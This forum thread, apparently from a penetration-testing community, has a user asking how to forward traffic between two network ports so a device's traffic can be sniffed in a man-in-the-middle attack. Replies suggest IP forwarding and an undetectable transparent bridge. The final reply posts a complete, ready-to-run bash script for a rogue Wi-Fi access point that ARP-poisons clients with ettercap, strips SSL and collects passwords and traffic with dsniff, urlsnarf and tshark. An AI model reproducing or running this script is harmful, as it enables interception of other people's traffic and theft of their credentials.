Printable View
So the title says it all.
My linux knowledge is still limited, and I would like to know how I can achieve this.
Should I be using iptables to set this up? if so, could someone provide the commands?
(redirecting all incoming/outgoing traffic from eth1 to eth2, and visa versa)
Thanks,
.L
Quote:
Originally Posted by Lucifer
Are you looking to setup a bridge or a route?
Well I'm not sure how to call it.
An ethernet device on my first port needs to be connected to the internet on my second port, and I'm looking to set up some mitm attacks between those two ports, so all the traffic from the ethernet client can be sniffed.
thanks,
sounds to me like you want to act as a router.
This command will enable IP forwarding and have your machine act as a router:
It's more complex than running just that command, though. You will need to make sure you have setup your routes correctly on both your victim machine and on your router. You haven't given me enough information to help you any further, and I suspect you're going to need to do a lot more reading.Code:echo 1 >/proc/sys/net/ipv4/ip_forward
If you're actually going to be wiring the device in to the middle like that then a transparent bridge would work fine, as then it cannot be detected by normal means on the network and you can then use the virtual bridge interface to monitor the traffic, and you don't have to mess around with routing.
It surprises me that it's really that hard like you say.
you could indeed say my linux box would be acting as a simple router between a client and the internet.
I just need to figure out how I can route every single packet from eth1 to eth2, and from eth2 to eth1, depending on the source/destination ofcourse. I thought that would be easy to setup, but I can't figure out how to do it.
EDIT: To streaker69, bridging the connections like you say might do the job. How would I need to configure it? I always figured there would be a quick and easy command to do so, or am I mistaken?
I'd think that a quick google search for "bridge +linux" would probably find it quickly. That's how I found it when I did something similar.Quote:
Originally Posted by Lucifer
as a matter of fact, I'm doing that right now, and it seems like I should install "bridge-utils". Is this tool (or a similar one) included in backtrack?
Just as another hint on this, you do not need to bind IP to either interface or your bridge to monitor it's traffic. If you want to stay completely silent on the LAN, you definitely do not want IP bound to these interfaces.
I've pieced this script together to work on wifi, but you could easily tailor it to work on a wired connection. Let me know if you have any issues.
Rogue AP + SSL MITM
Code:#!/bin/bash
LOGDIR="$(date +%F-%H%M)"
mkdir $LOGDIR
cd $LOGDIR
killall -9 dhcpd3 airbase-ng ettercap sslstrip driftnet urlsnarf tail
echo 'Network Interfaces:'
ifconfig | grep Link
echo -n "Enter the name of the interface connected to the internet, for example eth0: "
read -e IFACE
airmon-ng
echo -n "Enter your wireless interface name, for example wlan0: "
read -e WIFACE
echo -n "Enter the ESSID you would like your rogue AP to be called, for example Free WiFi: "
read -e ESSID
airmon-ng stop $WIFACE
ifconfig $WIFACE down
airmon-ng start $WIFACE
ifconfig $WIFACE up
modprobe tun
#airbase-ng is going to create our fake AP with the SSID we specified
airbase-ng -e $ESSID -P -C 30 -v mon0 > airbase.log &
xterm -bg black -fg yellow -T Airbase-NG -e tail -f airbase.log &
sleep 10
echo Configuring interface created by airdrop-ng
ifconfig at0 up
ifconfig at0 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
echo 'Setting up iptables to handle traffic seen by the airdrop-ng (at0) interface'
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -P FORWARD ACCEPT
iptables -t nat -A POSTROUTING -o $IFACE -j MASQUERADE
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-ports 10000
echo Creating a dhcpd.conf to assign addresses to clients that connect to us
echo "default-lease-time 600;" > dhcpd.conf
echo "max-lease-time 720;" >> dhcpd.conf
echo "ddns-update-style none;" >> dhcpd.conf
echo "authoritative;" >> dhcpd.conf
echo "log-facility local7;" >> dhcpd.conf
echo "subnet 10.0.0.0 netmask 255.255.255.0 {" >> dhcpd.conf
echo "range 10.0.0.100 10.0.0.254;" >> dhcpd.conf
echo "option routers 10.0.0.1;" >> dhcpd.conf
echo "option domain-name-servers 8.8.8.8;" >> dhcpd.conf
echo "}" >> dhcpd.conf
echo 'DHCP server starting on our airdrop-ng interface (at0)'
dhcpd3 -f -cf dhcpd.conf at0 &
echo "Launching DMESG"
xterm -bg black -fg red -T "System Logs" -e tail -f /var/log/messages &
echo "Launching ettercap, poisoning all hosts on the at0 interface's subnet"
xterm -bg black -fg blue -e ettercap -T -q -p -l etterca.log -i at0 // // &
sleep 8
echo 'Configuring ip forwarding'
echo "1" > /proc/sys/net/ipv4/ip_forward
echo 'Launching various tools'
sslstrip -a -k -f &
driftnet -v -i at0 &
xterm -bg black -fg green -e urlsnarf -i at0 &
dsniff -m -i at0 -d -w dsniff$(date +%F-%H%M).log &
tshark -i at0 -w traffic.pcap &
echo 'Run "etterlog -p etterca.log" to view sniffed passwords.'